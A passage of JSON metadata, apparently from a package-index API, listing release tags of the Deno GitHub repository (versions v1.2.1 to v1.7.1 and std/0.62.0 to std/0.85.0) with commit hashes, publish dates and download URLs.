url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e